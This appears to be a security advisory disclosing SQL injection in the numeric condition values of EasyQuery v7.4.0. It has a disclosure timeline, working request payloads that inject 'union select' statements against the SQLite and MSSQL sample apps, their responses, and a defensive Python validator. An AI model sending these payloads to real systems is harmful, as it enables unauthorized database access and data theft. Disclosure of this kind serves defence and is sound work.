## Description

EasyQuery v7.4.0 fails to escape/sanitize values provided in a numerical value condition when building SQL statements. The validation logic checking for numerical values is only implemented in the query builder UI. A modified request to the respective EasyQuery endpoints can be used to execute arbitrary SQL statements against the underlying database. This can be used to bypass any restrictions placed on EasyQuery via a constrained data model and to gain full access to the data source in use.

This appears to be an issue in the shared parts of the framework, as both the .NET Framework and the .NET Core example applications are affected.
## Affected Versions

Up to and including v7.4.0 (the product is closed source and there are dozens of released versions).

## Timeline
- [8/19/2025] Details submitted to vendor (via their ticketing system)
- [8/20/2025] Acknowledgement from vendor, no ETA for patched version provided
- [8/29/2025] Asked vendor for ETA again, no response
## Vendor Contact
- https://korzh.com/
## Version history
- https://www.nuget.org/packages/Korzh.EasyQuery#versions-body-tab (Framework components are versioned and released in lockstep)
## Steps to recreate (using the official example applications at https://github.com/easyquery/DotNetSamples)

### .NET Core - using the AdvancedSearch example project with its default SQLite backend

#### Request - /api/easyquery/models/nwind/fetch

```json
{"query":{"modelId":"nwind","modelName":null,"id":"quer-frjls2yl2ls8i","name":"[New query]","cols":[{"id":"col-tg3ls2yzlekzd","cptn":"Product Name","expr":{"tag":2,"dtype":1,"id":"Product.Name","val":"Product.Name"}}],"justsortcols":[],"extraData":{},"innerData":{"aggr":{"groups":[],"ugt":false,"urc":false,"csg":false,"aggregates":[],"enabled":false}},"root":{"tag":51,"linking":3,"conds":[{"tag":1,"op":"Equal","exprs":[{"tag":2,"dtype":3,"id":"Product.UnitsInStock","val":"Product.UnitsInStock"},{"tag":1,"dtype":3,"kind":0,"val":"1) union select 'v' || sqlite_version() --","txt":"1"}]}]},"extraConds":{"tag":51,"linking":3,"conds":[]},"timezoneOffset":-60,"locale":"en-US"},"chunk":{"offset":0,"limit":1000,"needTotal":true},"data":{}}
```
#### Response

```json
{"success":true,"result":"ok","resultSet":{"cols":[{"id":"col-tg3ls2yzlekzd","isAggr":false,"label":"Product Name","description":null,"type":1,"originAttrId":"Product.Name","dfmt":"","gfct":null,"style":{"alignment":0,"allowAutoFormatting":false}}],"rows":[["v3.41.2"]]},"meta":{"totalRecords":1,"offset":0},"aux":{}}
```
### .NET Framework - using the AdvancedSearch example project with its default MSSQL backend

#### Request - /api/easyquery/models/nwind/fetch

```json
{"query":{"modelId":"nwind","modelName":null,"id":"quer-8v9ls33yc22be","name":"[New query]","cols":[{"id":"col-9e4ls33z8po5o","cptn":"Product Product Name","expr":{"tag":2,"dtype":1,"id":"Products.ProductName","val":"Products.ProductName"}}],"justsortcols":[],"extraData":{},"innerData":{"aggr":{"groups":[],"ugt":false,"urc":false,"csg":false,"aggregates":[],"enabled":false}},"root":{"tag":51,"linking":3,"conds":[{"tag":1,"op":"Equal","exprs":[{"tag":2,"dtype":3,"id":"Products.UnitsInStock","val":"Products.UnitsInStock"},{"tag":1,"dtype":3,"kind":0,"val":"1) union select @@version --","txt":"1"}]}]},"extraConds":{"tag":51,"linking":3,"conds":[]},"timezoneOffset":-60,"locale":"en-US"},"chunk":{"offset":0,"limit":1000,"needTotal":true},"data":{}}
```
#### Response

```json
{"result":"ok","resultSet":{"cols":[{"id":"col-9e4ls33z8po5o","isAggr":false,"label":"Product Product Name","description":null,"type":1,"originAttrId":"Products.ProductName","dfmt":"","gfct":null,"style":{"alignment":0,"allowAutoFormatting":false}}],"rows":[["Microsoft SQL Server 2019 (RTM-CU27-GDR) (KB5040948) - 15.0.4382.1 (X64) \n\tJul 1 2024 20:03:23 \n\tCopyright (C) 2019 Microsoft Corporation\n\tExpress Edition (64-bit) on Windows 10 Home 10.0 <X64> (Build 26100: ) (Hypervisor)\n"]]},"meta":{"totalRecords":1,"offset":0}}
```
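As an added defensive example (not EasyQuery's code and not part of the sample applications), the following Python check performs on the server the numeric validation that the description says exists only in the query builder UI: it walks the condition tree of a fetch request in the shape of the two requests above and rejects any constant that is flagged as numeric but is not a plain decimal literal. The tag/dtype codes it relies on (1 = client-supplied constant, 3 = numeric, 51 = condition group) are assumptions read off those sample requests, not taken from any EasyQuery documentation, and the two requests embedded in the block are constructed.

```python
"""Server-side validation of numeric condition values in an EasyQuery-style
fetch request. Added illustration for this advisory, not vendor code."""
import json
import re
from typing import Iterator

# Assumption: these codes are read off the sample requests in the advisory
# ("tag": 1 = client-supplied constant, "dtype": 3 = numeric, "tag": 51 =
# condition group). They are not taken from any EasyQuery specification.
CONSTANT_TAG = 1
NUMERIC_DTYPE = 3
GROUP_TAG = 51

# A plain decimal literal: optional sign, digits, optional fraction/exponent.
# Anything else (quotes, parentheses, comment markers, keywords) fails the match.
_NUMERIC_RE = re.compile(r"^[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def is_numeric_literal(value) -> bool:
    """Accept a real number, or a string that consists only of a decimal literal."""
    if isinstance(value, bool):  # bool is an int subclass; not a number for our purposes
        return False
    if isinstance(value, (int, float)):
        return True
    return isinstance(value, str) and _NUMERIC_RE.match(value.strip()) is not None


def iter_constant_exprs(node: dict) -> Iterator[dict]:
    """Yield every constant expression in a (possibly nested) condition tree."""
    if node.get("tag") == GROUP_TAG:
        for cond in node.get("conds", []):
            yield from iter_constant_exprs(cond)
        return
    for expr in node.get("exprs", []):
        if expr.get("tag") == CONSTANT_TAG:
            yield expr


def find_violations(body: str) -> list:
    """Return the constant values that claim to be numeric but are not (empty list = OK)."""
    query = json.loads(body).get("query", {})
    bad = []
    for key in ("root", "extraConds"):
        tree = query.get(key)
        if tree:
            for expr in iter_constant_exprs(tree):
                if expr.get("dtype") == NUMERIC_DTYPE and not is_numeric_literal(expr.get("val")):
                    bad.append(str(expr.get("val")))
    return bad


def validate_fetch_request(body: str) -> bool:
    """True if the request may be handed to the query builder, False if it must be rejected."""
    return not find_violations(body)


def _request(val):
    """Constructed sample request in the shape of the advisory's fetch payloads."""
    return json.dumps({
        "query": {
            "modelId": "nwind",
            "root": {"tag": 51, "linking": 3, "conds": [
                {"tag": 1, "op": "Equal", "exprs": [
                    {"tag": 2, "dtype": 3, "id": "Product.UnitsInStock", "val": "Product.UnitsInStock"},
                    {"tag": 1, "dtype": 3, "kind": 0, "val": val, "txt": "1"}]}]},
            "extraConds": {"tag": 51, "linking": 3, "conds": []}},
        "chunk": {"offset": 0, "limit": 1000, "needTotal": True}})


SAMPLE_OK = _request("1")        # constructed: what the query builder UI would send
SAMPLE_BAD = _request("1 abc")   # constructed: not a number, so it must be rejected

if __name__ == "__main__":
    print("well-formed request accepted:", validate_fetch_request(SAMPLE_OK))
    print("malformed request violations:", find_violations(SAMPLE_BAD))
```

In a deployment this check would sit in front of the query builder (for example as an ASP.NET Core action filter on the fetch endpoint), and the database-side mitigation is to bind numeric constants as parameters rather than splicing them into the statement text. The allow-list regex is intentionally stricter than `float()` parsing, which would also accept forms such as `1_000`, `nan` or `inf`.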
Many thanks for your awesome work!